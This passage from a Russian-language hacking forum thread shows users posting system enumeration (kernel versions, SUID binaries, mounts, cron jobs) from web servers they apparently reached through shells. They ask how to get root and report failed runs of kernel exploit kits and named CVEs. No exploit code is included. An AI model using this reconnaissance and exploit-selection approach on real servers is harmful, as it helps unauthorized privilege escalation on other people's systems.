    -rwx------   1 root root  270 Mar  1  2011 rm_old_cronjobs.sh
    Code:
    total 24
    drwxr-xr-x   2 root root 4096 Nov 14  2011 .
    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwxr-xr-x   1 root root  895 Jan  3  2011 man-db
    -rwxr-xr-x   1 root root 1784 Apr  6  2010 rkhunter
    -rwxr-xr-x   1 root root 1133 Sep 10  2010 sysklogd
    GCC присутствует, но права на него отсутствуют
    Пробовал использовать enlightenment из шапки, результат вот:
    Code:
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...OK.
    Compiling exp_wunderbar.c...OK.
    ./run_null_exploits.sh: line 61: /usr/bin/gcc: Permission denied
    ./run_null_exploits.sh: line 63: ./pwnkernel: No such file or directory
     
  6. grimnir

    grimnir Members of Antichat

  7. 1024

    1024 New Member

    Ну, спасайте, господа товарищи олдфаги.
    Code:
    uname -a :
    Linux admin-server 2.6.32-43-generic-pae #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012 i686 GNU/Linux
    ls -la /boot :
    total 20016
    drwxr-xr-x  3 root root     4096 Oct  9  2012 .
    drwxr-xr-x 22 root root     4096 Jul 18 15:20 ..
    -rw-r--r--  1 root root  1735360 Sep  6  2012 System.map-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   656323 Sep  6  2012 abi-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   116469 Sep  6  2012 config-2.6.32-43-generic-pae
    drwxr-xr-x  3 root root     4096 Oct  8  2012 grub
    -rw-r--r--  1 root root 13612578 Oct  9  2012 initrd.img-2.6.32-43-generic-pae
    -rw-r--r--  1 root root   160280 Mar 23  2010 memtest86+.bin
    -rw-r--r--  1 root root     1200 Sep  6  2012 vmcoreinfo-2.6.32-43-generic-pae
    -rw-r--r--  1 root root  4183264 Sep  6  2012 vmlinuz-2.6.32-43-generic-pae
    lls -la --full-time /lib :
    (пусто)
    mount :
    /dev/sda1 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    none on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    none on /dev type devtmpfs (rw,mode=0755)
    none on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    none on /dev/shm type tmpfs (rw,nosuid,nodev)
    none on /var/run type tmpfs (rw,nosuid,mode=0755)
    none on /var/lock type tmpfs (rw,noexec,nosuid,nodev)
    none on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    gvfs-fuse-daemon on /home/administrator/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=administrator)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,noexec,nosuid,nodev)
    /dev/fuse on /tmp/exploit||/tmp/exploit type fuse (rw,nosuid,nodev,user=www-data)
    /dev/fuse on /tmp/_ type fuse (rw,nosuid,nodev,user=www-data)
    df -h :
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/sda1             231G   18G  202G   8% /
    none                  1.9G  280K  1.9G   1% /dev
    none                  1.9G  432K  1.9G   1% /dev/shm
    none                  1.9G  116K  1.9G   1% /var/run
    none                  1.9G     0  1.9G   0% /var/lock
    none                  1.9G     0  1.9G   0% /lib/init/rw
    cat /etc/issue :
    Ubuntu 10.04.4 LTS \n \l
    кронтаб: см.далее
    cat /proc/version :
    Linux version 2.6.32-43-generic-pae (buildd@roseapple) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:59:17 UTC 2012
    cat /proc/sys/vm/mmap_min_addr :
    65536
    pwd :
    /var/www/login_bak/style ( drwxr----- )
    ls -la /usr/bin/staprun :
    (пусто)
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null :
    -rwsr-xr-x 1 root root 9724 Feb 19  2010 /sbin/mount.ecryptfs_private
    -rwsr-xr-- 1 root dip 273312 Mar  7  2010 /usr/sbin/pppd
    -rwsr-sr-x 1 libuuid libuuid 13848 Jan 21  2011 /usr/sbin/uuidd
    -rwsr-xr-x 1 root root 18056 Apr 20  2011 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 127668 Jan 20  2011 /usr/bin/sudo
    -rwsr-sr-x 1 root root 9672 Jan 19  2012 /usr/bin/X
    -rwsr-xr-x 1 root lpadmin 13540 Sep 12  2011 /usr/bin/lppasswd
    -rwsr-xr-x 1 root root 127668 Jan 20  2011 /usr/bin/sudoedit
    -rwsr-sr-x 1 daemon daemon 42752 Jan 15  2011 /usr/bin/at
    -rwsr-xr-x 1 root root 52092 Mar  7  2010 /usr/bin/mtr
    -rwsr-xr-x 1 root root 26356 Feb  2  2010 /usr/bin/fping
    -rwsr-xr-x 1 root root 53812 Feb 15  2011 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 13820 Mar 12  2010 /usr/bin/arping
    -rwsr-xr-x 1 root root 37140 Feb 15  2011 /usr/bin/passwd
    -rwsr-xr-x 1 root root 13952 Mar 12  2010 /usr/bin/traceroute6.iputils
    -rwsr-xr-x 1 root root 31700 Feb 15  2011 /usr/bin/chsh
    -rwsr-xr-x 1 root root 26388 Feb  2  2010 /usr/bin/fping6
    -rwsr-xr-x 1 root root 26784 Feb 15  2011 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 36180 Feb 15  2011 /usr/bin/chfn
    -rwsr-xr-x 1 root root 5548 Nov 10  2009 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 9720 Apr 20  2011 /usr/lib/policykit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 9676 Jan 22  2011 /usr/lib/pt_chown
    -rwsr-xr-x 1 root root 13780 Apr 18  2010 /usr/lib/chromium-browser/chromium-browser-sandbox
    -rwsr-xr-x 1 root root 182464 Jun 17  2011 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 11019 Nov 21  2009 /usr/lib/kde4/libexec/fileshareset
    -rwsr-xr-x 1 root root 26456 Mar 12  2010 /bin/ping6
    -rwsr-xr-x 1 root root 72188 Jan 21  2011 /bin/mount
    -rwsr-xr-x 1 root root 31100 Feb 15  2011 /bin/su
    -rwsr-xr-x 1 root root 34756 Mar 12  2010 /bin/ping
    -rwsr-xr-x 1 root root 26244 Feb 12  2011 /bin/fusermount
    -rwsr-xr-x 1 root root 51224 Jan 21  2011 /bin/umount
    -rwsr-xr-- 1 root messagebus 42492 Jul 23  2011 /lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 14024 Apr  6  2013 /opt/google/chrome/chrome-sandbox
    -rwsr-sr-x 1 root root 3676623 Jan 10  2010 /opt/AutoScan/bin/autoscan-network-daemon
    
    linuxprivchecker.py:
    http://my-files.ru/zf4cbx
    Опробованы все эксплоиты из linuxprivchecker, компилятся почти все, не отрабатывает ни один (без ошибок, просто нет результата). Из того, что в чекере нет: система должна быть подвержена CVE-2014-0196 и CVE-2014-3153, но под первую нет эксплоита на мою версию ядра, эксплоит под вторую не работает.
    Нарыл две уязвимости этого года, но одна неюзабельна из-за отличающейся версии ОС, вторую (CVE-2015-3202) нет возможности проверить (чтобы узнать, сработало или нет, надо ждать логина в систему из-под рута. С таким админом его можно ждать вечно...).
    Хелп.
     
    #587 1024, 21 Jul 2015
    Last edited: 21 Jul 2015
  8. andrman

    andrman New Member

    Подскажите, пожалуйста, по этому серверу
    Code:
    ***********uname -a
    Linux 2.6.32-431.29.2.el6.x86_64 #1 SMP Sun Jul 27 15:55:46 EDT 2014 x86_64 x86_64 x86_64 GNU/Linux
    **********ls -la /boot
    total 80526
    dr-xr-xr-x.  5 root root     3072 Jul 31 04:15 .
    dr-xr-xr-x. 29 root root     4096 Jul 31 01:05 ..
    -rw-r--r--   1 root root      171 Jul 27  2014 .vmlinuz-2.6.32-431.29.2.el6.x86_64.hmac
    -rw-r--r--   1 root root      171 Mar 10 17:05 .vmlinuz-2.6.32-504.16.2.el6.x86_64.hmac
    -rw-r--r--   1 root root      171 May 29 10:21 .vmlinuz-2.6.32-504.23.4.el6.x86_64.hmac
    -rw-r--r--   1 root root  2519815 Jul 27  2014 System.map-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--   1 root root  2545609 Mar 10 17:05 System.map-2.6.32-504.16.2.el6.x86_64
    -rw-r--r--   1 root root  2545975 May 29 10:21 System.map-2.6.32-504.23.4.el6.x86_64
    -rw-r--r--   1 root root   105200 Jul 27  2014 config-2.6.32-431.29.2.el6.x86_64
    -rw-r--r--   1 root root   106313 Mar 10 17:05 config-2.6.32-504.16.2.el6.x86_64
    -rw-r--r--   1 root root   106371 May 29 10:21 config-2.6.32-504.23.4.el6.x86_64
    drwxr-xr-x.  3 root root     1024 Oct 25  2013 efi
    drwxr-xr-x.  2 root root     1024 Jul 21 01:48 grub
    -rw-------   1 root root 17153340 Nov  6  2014 initramfs-2.6.32-431.29.2.el6.x86_64.img
    -rw-------   1 root root 19351653 Jun 10 03:45 initramfs-2.6.32-504.16.2.el6.x86_64.img
    -rw-------   1 root root 19354839 Jul 21 01:48 initramfs-2.6.32-504.23.4.el6.x86_64.img
    -rw-------   1 root root  5598321 Apr 28 02:44 initrd-2.6.32-431.29.2.el6.x86_64kdump.img
    drwx------.  2 root root    12288 Oct 25  2013 lost+found
    -rw-r--r--   1 root root   193945 Jul 27  2014 symvers-2.6.32-431.29.2.el6.x86_64.gz
    -rw-r--r--   1 root root   200317 Mar 10 17:06 symvers-2.6.32-504.16.2.el6.x86_64.gz
    -rw-r--r--   1 root root   200210 May 29 10:22 symvers-2.6.32-504.23.4.el6.x86_64.gz
    -rwxr-xr-x   1 root root  4132336 Jul 27  2014 vmlinuz-2.6.32-431.29.2.el6.x86_64
    -rwxr-xr-x   1 root root  4153296 Mar 10 17:05 vmlinuz-2.6.32-504.16.2.el6.x86_64
    -rwxr-xr-x   1 root root  4154992 May 29 10:21 vmlinuz-2.6.32-504.23.4.el6.x86_64
    ***************lls -la --full-time /lib
    sh: lls: command not found
    *********************ls -la --full-time /lib
    total 3760
    dr-xr-xr-x. 13 root root    4096 2015-07-21 01:47:08.711114108 -0400 .
    dr-xr-xr-x. 29 root root    4096 2015-07-31 01:05:31.931316783 -0400 ..
    drwxr-xr-x.  3 root root    4096 2015-01-12 08:24:24.000000000 -0500 alsa
    lrwxrwxrwx   1 root root      14 2015-01-22 01:39:24.006519825 -0500 cpp -> ../usr/bin/cpp
    drwxr-xr-x.  3 root root    4096 2015-01-22 01:41:16.608712599 -0500 crda
    drwxr-xr-x. 44 root root   12288 2015-07-21 01:45:25.921755167 -0400 firmware
    drwxr-xr-x.  3 root root    4096 2015-05-20 16:46:40.000000000 -0400 i686
    drwxr-xr-x.  6 root root    4096 2013-10-25 03:57:52.000000000 -0400 kbd
    -rwxr-xr-x   1 root root  141140 2015-05-20 17:12:39.000000000 -0400 ld-2.12.so
    lrwxrwxrwx   1 root root      10 2015-07-21 01:47:08.518117237 -0400 ld-linux.so.2 -> ld-2.12.so
    -rwxr-xr-x   1 root root    7220 2015-05-20 17:12:36.000000000 -0400 libBrokenLocale-2.12.so
    lrwxrwxrwx   1 root root      23 2015-07-21 01:47:08.519117221 -0400 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so
    -rwxr-xr-x   1 root root   20372 2015-05-20 17:12:40.000000000 -0400 libSegFault.so
    -rwxr-xr-x   1 root root   13412 2015-05-20 17:12:39.000000000 -0400 libanl-2.12.so
    lrwxrwxrwx   1 root root      14 2015-07-21 01:47:08.521117189 -0400 libanl.so.1 -> libanl-2.12.so
    -rwxr-xr-x   1 root root 1902892 2015-05-20 17:12:38.000000000 -0400 libc-2.12.so
    lrwxrwxrwx   1 root root      12 2015-07-21 01:47:08.641115242 -0400 libc.so.6 -> libc-2.12.so
    -rwxr-xr-x   1 root root  190988 2015-05-20 17:12:37.000000000 -0400 libcidn-2.12.so
    lrwxrwxrwx   1 root root      15 2015-07-21 01:47:08.651115080 -0400 libcidn.so.1 -> libcidn-2.12.so
    -rwxr-xr-x   1 root root   38376 2015-05-20 17:12:40.000000000 -0400 libcrypt-2.12.so
    lrwxrwxrwx   1 root root      16 2015-07-21 01:47:08.653115048 -0400 libcrypt.so.1 -> libcrypt-2.12.so
    -rwxr-xr-x   1 root root   17892 2015-05-20 17:12:37.000000000 -0400 libdl-2.12.so
    lrwxrwxrwx   1 root root      13 2015-07-21 01:47:08.655115016 -0400 libdl.so.2 -> libdl-2.12.so
    -rw-r--r--   1 root root     899 2015-01-28 17:12:07.000000000 -0500 libfreebl3.chk
    -rwxr-xr-x   1 root root    9604 2015-01-28 17:12:06.000000000 -0500 libfreebl3.so
    -rw-r--r--   1 root root     899 2015-01-28 17:12:07.000000000 -0500 libfreeblpriv3.chk
    -rwxr-xr-x   1 root root  378504 2015-01-28 17:12:06.000000000 -0500 libfreeblpriv3.so
    -rwxr-xr-x   1 root root  120672 2014-09-01 09:11:34.000000000 -0400 libgcc_s-4.4.7-20120601.so.1
    lrwxrwxrwx   1 root root      28 2015-01-22 01:41:30.798484873 -0500 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1
    -rwxr-xr-x   1 root root  200024 2015-05-20 17:12:36.000000000 -0400 libm-2.12.so
    lrwxrwxrwx   1 root root      12 2015-07-21 01:47:08.667114822 -0400 libm.so.6 -> libm-2.12.so
    -rwxr-xr-x   1 root root  113908 2015-05-20 17:12:39.000000000 -0400 libnsl-2.12.so
    lrwxrwxrwx   1 root root      14 2015-07-21 01:47:08.674114708 -0400 libnsl.so.1 -> libnsl-2.12.so
    -rwxr-xr-x   1 root root   40196 2015-05-20 17:12:35.000000000 -0400 libnss_compat-2.12.so
    lrwxrwxrwx   1 root root      21 2015-07-21 01:47:08.677114659 -0400 libnss_compat.so.2 -> libnss_compat-2.12.so
    -rwxr-xr-x   1 root root   25592 2015-05-20 17:12:40.000000000 -0400 libnss_dns-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.679114626 -0400 libnss_dns.so.2 -> libnss_dns-2.12.so
    -rwxr-xr-x   1 root root   58704 2015-05-20 17:12:40.000000000 -0400 libnss_files-2.12.so
    lrwxrwxrwx   1 root root      20 2015-07-21 01:47:08.682114578 -0400 libnss_files.so.2 -> libnss_files-2.12.so
    -rwxr-xr-x   1 root root   22136 2015-05-20 17:12:37.000000000 -0400 libnss_hesiod-2.12.so
    lrwxrwxrwx   1 root root      21 2015-07-21 01:47:08.684114546 -0400 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so
    -rwxr-xr-x   1 root root   49708 2015-05-20 17:12:37.000000000 -0400 libnss_nis-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.687114497 -0400 libnss_nis.so.2 -> libnss_nis-2.12.so
    -rwxr-xr-x   1 root root   58708 2015-05-20 17:12:38.000000000 -0400 libnss_nisplus-2.12.so
    lrwxrwxrwx   1 root root      22 2015-07-21 01:47:08.690114448 -0400 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so
    -rwxr-xr-x   1 root root  131220 2015-05-20 17:12:35.000000000 -0400 libpthread-2.12.so
    lrwxrwxrwx   1 root root      18 2015-07-21 01:47:08.698114318 -0400 libpthread.so.0 -> libpthread-2.12.so
    -rwxr-xr-x   1 root root  103384 2015-05-20 17:12:39.000000000 -0400 libresolv-2.12.so
    lrwxrwxrwx   1 root root      17 2015-07-21 01:47:08.705114205 -0400 libresolv.so.2 -> libresolv-2.12.so
    -rwxr-xr-x   1 root root   39708 2015-05-20 17:12:36.000000000 -0400 librt-2.12.so
    lrwxrwxrwx   1 root root      13 2015-07-21 01:47:08.708114156 -0400 librt.so.1 -> librt-2.12.so
    -rwxr-xr-x   1 root root   31616 2015-05-20 17:12:41.000000000 -0400 libthread_db-1.0.so
    lrwxrwxrwx   1 root root      19 2015-07-21 01:47:08.710114124 -0400 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x   1 root root   12788 2015-05-20 17:12:40.000000000 -0400 libutil-2.12.so
    lrwxrwxrwx   1 root root      15 2015-07-21 01:47:08.710114124 -0400 libutil.so.1 -> libutil-2.12.so
    drwxr-xr-x.  2 root root    4096 2013-10-25 13:09:41.000000000 -0400 lsb
    dr-xr-xr-x.  5 root root    4096 2015-07-21 01:47:10.410086560 -0400 modules
    drwxr-xr-x.  3 root root    4096 2015-07-21 01:47:08.730113800 -0400 rtkaio
    drwxr-xr-x.  2 root root    4096 2014-07-17 11:36:23.000000000 -0400 security
    drwxr-xr-x.  6 root root    4096 2013-10-25 03:57:01.000000000 -0400 terminfo
    drwxr-xr-x.  5 root root    4096 2015-01-22 01:39:34.385353241 -0500 udev
    ********************mount
    /dev/mapper/VolGroup-lv_root on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /etc/named on /var/named/chroot/etc/named type none (rw,bind)
    /var/named on /var/named/chroot/var/named type none (rw,bind)
    /usr/lib64/bind on /var/named/chroot/usr/lib64/bind type none (rw,bind)
    *************************df -h
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/mapper/VolGroup-lv_root
                          909G  587G  276G  69% /
    tmpfs                  16G  1.1G   15G   7% /dev/shm
    /dev/sda1             243M   86M  145M  38% /boot
    sh-4.1$ cat /etc/issue
    cat /etc/issue
    Red Hat Enterprise Linux Server release 6.6 (Santiago)
    Kernel \r on an \m
    *******************cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    
    ****************ls -la cron.d
    ls: cannot access cron.d: No such file or directory
    *************ls -la cron.hourly
    ls: cannot access cron.hourly: No such file or directory
    **********************ls -la cron.monthly
    ls: cannot access cron.monthly: No such file or directory
    ********************ls -la cron.weekly
    ls: cannot access cron.weekly: No such file or directory
    ******************cat /proc/version
    Linux version 2.6.32-431.29.2.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC) ) #1 SMP Sun Jul 27 15:55:46 EDT 2014
    ******************cat /proc/sys/vm/mmap_min_addr
    4096
    sh-4.1$ pwd
    pwd
    /var/www/vhost//httpdoc/lib
    ************ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 Jun 23  2014 /usr/bin/staprun
    ******************
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/nul
    sh: /dev/nul: Permission denied
    
     
  9. d4rk73rr0r

    d4rk73rr0r Member

    Подскажите пожалуйста, можно ли рутить этот сервер?
    $ uname -a 2>&1
    Code:
    Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot 2>&1
    Code:
    total 652860
    drwxr-xr-x  3 root root    12288 Jun 20 08:15 .
    drwxr-xr-x 24 root root     4096 Jun 16 08:07 ..
    -rw-------  1 root root  3372643 May  3  2014 System.map-3.13.0-24-generic
    -rw-------  1 root root  3378267 Jun  5  2014 System.map-3.13.0-29-generic
    -rw-------  1 root root  3378641 Jul  5  2014 System.map-3.13.0-30-generic
    -rw-------  1 root root  3381262 Jul 15  2014 System.map-3.13.0-32-generic
    -rw-------  1 root root  3381262 Jul 29  2014 System.map-3.13.0-33-generic
    -rw-------  1 root root  3381262 Aug 13  2014 System.map-3.13.0-34-generic
    -rw-------  1 root root  3386444 Aug 15  2014 System.map-3.13.0-35-generic
    -rw-------  1 root root  3386479 Sep  4  2014 System.map-3.13.0-36-generic
    -rw-------  1 root root  3386945 Sep 23  2014 System.map-3.13.0-37-generic
    -rw-------  1 root root  3386936 Oct 28  2014 System.map-3.13.0-39-generic
    -rw-------  1 root root  3387231 Nov 13  2014 System.map-3.13.0-40-generic
    -rw-------  1 root root  3388792 Nov 25  2014 System.map-3.13.0-41-generic
    -rw-------  1 root root  3388760 Dec  9  2014 System.map-3.13.0-43-generic
    -rw-------  1 root root  3388834 Dec 16  2014 System.map-3.13.0-44-generic
    -rw-------  1 root root  3389458 Mar 11 01:43 System.map-3.13.0-46-generic
    -rw-------  1 root root  3389235 Mar 12 16:52 System.map-3.13.0-48-generic
    -rw-------  1 root root  3389437 Apr 11 02:05 System.map-3.13.0-49-generic
    -rw-------  1 root root  3389875 Apr 15 18:03 System.map-3.13.0-51-generic
    -rw-------  1 root root  3389875 May  4 10:09 System.map-3.13.0-52-generic
    -rw-------  1 root root  3390132 May 20 16:11 System.map-3.13.0-53-generic
    -rw-------  1 root root  3390881 May 27 01:11 System.map-3.13.0-54-generic
    -rw-------  1 root root  3390881 Jun 18 06:03 System.map-3.13.0-55-generic
    -rw-r--r--  1 root root  1158016 May  3  2014 abi-3.13.0-24-generic
    -rw-r--r--  1 root root  1161764 Jun  5  2014 abi-3.13.0-29-generic
    -rw-r--r--  1 root root  1162257 Jul  5  2014 abi-3.13.0-30-generic
    -rw-r--r--  1 root root  1162712 Jul 15  2014 abi-3.13.0-32-generic
    -rw-r--r--  1 root root  1162712 Jul 29  2014 abi-3.13.0-33-generic
    -rw-r--r--  1 root root  1162712 Aug 13  2014 abi-3.13.0-34-generic
    -rw-r--r--  1 root root  1163858 Aug 15  2014 abi-3.13.0-35-generic
    -rw-r--r--  1 root root  1163858 Sep  4  2014 abi-3.13.0-36-generic
    -rw-r--r--  1 root root  1164489 Sep 23  2014 abi-3.13.0-37-generic
    -rw-r--r--  1 root root  1164547 Oct 28  2014 abi-3.13.0-39-generic
    -rw-r--r--  1 root root  1164509 Nov 13  2014 abi-3.13.0-40-generic
    -rw-r--r--  1 root root  1164720 Nov 25  2014 abi-3.13.0-41-generic
    -rw-r--r--  1 root root  1164720 Dec  9  2014 abi-3.13.0-43-generic
    -rw-r--r--  1 root root  1164720 Dec 16  2014 abi-3.13.0-44-generic
    -rw-r--r--  1 root root  1164852 Mar 11 01:43 abi-3.13.0-46-generic
    -rw-r--r--  1 root root  1164723 Mar 12 16:52 abi-3.13.0-48-generic
    -rw-r--r--  1 root root  1164723 Apr 11 02:05 abi-3.13.0-49-generic
    -rw-r--r--  1 root root  1164671 Apr 15 18:03 abi-3.13.0-51-generic
    -rw-r--r--  1 root root  1164671 May  4 10:09 abi-3.13.0-52-generic
    -rw-r--r--  1 root root  1164671 May 20 16:11 abi-3.13.0-53-generic
    -rw-r--r--  1 root root  1164806 May 27 01:11 abi-3.13.0-54-generic
    -rw-r--r--  1 root root  1164806 Jun 18 06:03 abi-3.13.0-55-generic
    -rw-r--r--  1 root root   165510 May  3  2014 config-3.13.0-24-generic
    -rw-r--r--  1 root root   165544 Jun  5  2014 config-3.13.0-29-generic
    -rw-r--r--  1 root root   165576 Jul  5  2014 config-3.13.0-30-generic
    -rw-r--r--  1 root root   165611 Jul 15  2014 config-3.13.0-32-generic
    -rw-r--r--  1 root root   165611 Jul 29  2014 config-3.13.0-33-generic
    -rw-r--r--  1 root root   165611 Aug 13  2014 config-3.13.0-34-generic
    -rw-r--r--  1 root root   165652 Aug 15  2014 config-3.13.0-35-generic
    -rw-r--r--  1 root root   165671 Sep  4  2014 config-3.13.0-36-generic
    -rw-r--r--  1 root root   165712 Sep 23  2014 config-3.13.0-37-generic
    -rw-r--r--  1 root root   165712 Oct 28  2014 config-3.13.0-39-generic
    -rw-r--r--  1 root root   165745 Nov 13  2014 config-3.13.0-40-generic
    -rw-r--r--  1 root root   165745 Nov 25  2014 config-3.13.0-41-generic
    -rw-r--r--  1 root root   165745 Dec  9  2014 config-3.13.0-43-generic
    -rw-r--r--  1 root root   165748 Dec 16  2014 config-3.13.0-44-generic
    -rw-r--r--  1 root root   165748 Mar 11 01:43 config-3.13.0-46-generic
    -rw-r--r--  1 root root   165773 Mar 12 16:52 config-3.13.0-48-generic
    -rw-r--r--  1 root root   165773 Apr 11 02:05 config-3.13.0-49-generic
    -rw-r--r--  1 root root   165762 Apr 15 18:03 config-3.13.0-51-generic
    -rw-r--r--  1 root root   165762 May  4 10:09 config-3.13.0-52-generic
    -rw-r--r--  1 root root   165762 May 20 16:11 config-3.13.0-53-generic
    -rw-r--r--  1 root root   165762 May 27 01:11 config-3.13.0-54-generic
    -rw-r--r--  1 root root   165762 Jun 18 06:03 config-3.13.0-55-generic
    drwxr-xr-x  5 root root     4096 Jun 20 08:15 grub
    -rw-r--r--  1 root root 19692919 Jun 25  2014 initrd.img-3.13.0-24-generic
    -rw-r--r--  1 root root 19693496 Jun 25  2014 initrd.img-3.13.0-29-generic
    -rw-r--r--  1 root root 19802843 Jul 10  2014 initrd.img-3.13.0-30-generic
    -rw-r--r--  1 root root 19805892 Jul 30  2014 initrd.img-3.13.0-32-generic
    -rw-r--r--  1 root root 19806330 Aug 12  2014 initrd.img-3.13.0-33-generic
    -rw-r--r--  1 root root 19807084 Aug 14  2014 initrd.img-3.13.0-34-generic
    -rw-r--r--  1 root root 19814700 Aug 29  2014 initrd.img-3.13.0-35-generic
    -rw-r--r--  1 root root 19827146 Sep 23  2014 initrd.img-3.13.0-36-generic
    -rw-r--r--  1 root root 19826914 Oct  9  2014 initrd.img-3.13.0-37-generic
    -rw-r--r--  1 root root 19826798 Oct 30  2014 initrd.img-3.13.0-39-generic
    -rw-r--r--  1 root root 19831562 Nov 25  2014 initrd.img-3.13.0-40-generic
    -rw-r--r--  1 root root 19857194 Dec 11  2014 initrd.img-3.13.0-41-generic
    -rw-r--r--  1 root root 19858798 Dec 12  2014 initrd.img-3.13.0-43-generic
    -rw-r--r--  1 root root 19860064 Jan 13  2015 initrd.img-3.13.0-44-generic
    -rw-r--r--  1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
    -rw-r--r--  1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
    -rw-r--r--  1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
    -rw-r--r--  1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
    -rw-r--r--  1 root root 19865264 May  7 08:07 initrd.img-3.13.0-52-generic
    -rw-r--r--  1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
    -rw-r--r--  1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
    -rw-r--r--  1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
    -rw-r--r--  1 root root   176500 Mar 12  2014 memtest86+.bin
    -rw-r--r--  1 root root   178176 Mar 12  2014 memtest86+.elf
    -rw-r--r--  1 root root   178680 Mar 12  2014 memtest86+_multiboot.bin
    -rw-------  1 root root  5776416 May  3  2014 vmlinuz-3.13.0-24-generic
    -rw-------  1 root root  5792544 Jun  5  2014 vmlinuz-3.13.0-29-generic
    -rw-------  1 root root  5792608 Jul  5  2014 vmlinuz-3.13.0-30-generic
    -rw-------  1 root root  5798112 Jul 15  2014 vmlinuz-3.13.0-32-generic
    -rw-------  1 root root  5798688 Jul 29  2014 vmlinuz-3.13.0-33-generic
    -rw-------  1 root root  5797728 Aug 13  2014 vmlinuz-3.13.0-34-generic
    -rw-------  1 root root  5806368 Aug 15  2014 vmlinuz-3.13.0-35-generic
    -rw-------  1 root root  5806848 Sep  4  2014 vmlinuz-3.13.0-36-generic
    -rw-------  1 root root  5808832 Sep 23  2014 vmlinuz-3.13.0-37-generic
    -rw-------  1 root root  5808544 Oct 28  2014 vmlinuz-3.13.0-39-generic
    -rw-------  1 root root  5808960 Nov 13  2014 vmlinuz-3.13.0-40-generic
    -rw-------  1 root root  5814112 Nov 25  2014 vmlinuz-3.13.0-41-generic
    -rw-------  1 root root  5814080 Dec  9  2014 vmlinuz-3.13.0-43-generic
    -rw-------  1 root root  5814496 Dec 16  2014 vmlinuz-3.13.0-44-generic
    -rw-------  1 root root  5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
    -rw-------  1 root root  5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
    -rw-------  1 root root  5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
    -rw-------  1 root root  5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
    -rw-------  1 root root  5818592 May  4 10:09 vmlinuz-3.13.0-52-generic
    -rw-------  1 root root  5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
    -rw-------  1 root root  5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
    -rw-------  1 root root  5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic
    ls -la --full-time /lib 2>&1
    Code:
    total 312
    drwxr-xr-x 23 root root  4096 2015-02-27 08:01:04.121244740 +0500 .
    drwxr-xr-x 24 root root  4096 2015-06-16 08:07:45.004506276 +0500 ..
    drwxr-xr-x  2 root root  4096 2014-11-21 07:40:33.676606953 +0500 apparmor
